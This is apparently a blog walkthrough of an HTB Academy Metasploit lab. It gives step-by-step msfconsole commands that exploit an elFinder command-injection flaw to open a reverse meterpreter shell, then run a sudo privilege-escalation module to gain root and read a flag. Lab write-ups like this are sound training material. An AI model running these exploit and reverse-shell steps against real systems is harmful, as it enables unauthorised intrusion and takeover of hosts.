DEV Community

maz4l
maz4l

Posted on

HTB Academy | Using the Metasploit Framework Module -Sessions & Jobs

Image description
My HTB Academy unique referral link >>

Question N1:

The target has a specific web application running that we can find by looking into the HTML source code. What is the name of that web application?

Explore the web page at using a browser's devtools. Look for the name of the web application within the HTML source code, typically indicated in the tag.

Hint: You can use Chrome DevTools or Firefox DevTools for inspecting the HTML source code.
Image description

Answer N1: elFinder

Question N2:

Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?

[★]$ msfconsole

[msf]>> search exploit elfinder
Enter fullscreen mode Exit fullscreen mode

Image description

[msf] >> use 3

[msf] exploit(linux/http/elfinder_archive_cmd_injection) >> options

>> set RHOSTS <target ip>

>> set LHOST tun0

>> set LPORT 4444

>> set payload linux/x64/meterpreter/reverse_tcp

[msf]>>exploit(linux/http/elfinder_archive_cmd_injection) >> exploit
Enter fullscreen mode Exit fullscreen mode

Image description

Answer2: The username of the user obtained with the shell is www-data.

Question N3:

The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.
>> background (or Ctrl+Z)/ if session Died / use: >>exploit -j

Image description
>> search sudo

Image description

>> use 27

>> options
Enter fullscreen mode Exit fullscreen mode

Image description

>> set LHOST tun0

>> set LPORT 1234

>> set payload linux/x64/meterpreter/reverse_tcp

>> sessions
Enter fullscreen mode Exit fullscreen mode

Image description

>> set session 3

>> exploit
Enter fullscreen mode Exit fullscreen mode

Image description
Great, now we are root!
Image description

All that remains is to pick up the flag!

Happy hacking!

Top comments (0)